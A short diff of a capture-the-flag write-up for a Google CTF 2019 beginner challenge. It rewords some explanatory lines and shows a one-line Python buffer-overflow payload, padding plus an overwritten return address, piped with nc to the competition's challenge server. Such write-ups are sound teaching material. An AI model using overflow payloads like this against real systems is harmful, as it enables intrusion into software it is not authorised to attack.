konelav/writeups/GoogleCTF2019-BQ/Day4.STOP.GAN.md

 Notice that there is no segmentation fault, the program thinks that everything is Ok.
-And there is message that it tries but could not open a flag tells us that we are on the right way.
-Check it with remote
+And there is message that it tries but could not open a flag.
+This tells us that we are on the right way.
+Check it with remote server:
-server:

     $ python -c "print('run\n' + 'A'*260 + 'A'*4 + '\x58\x08\x40')" | nc buffer-overflow.ctfcompetition.com 1337
     Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.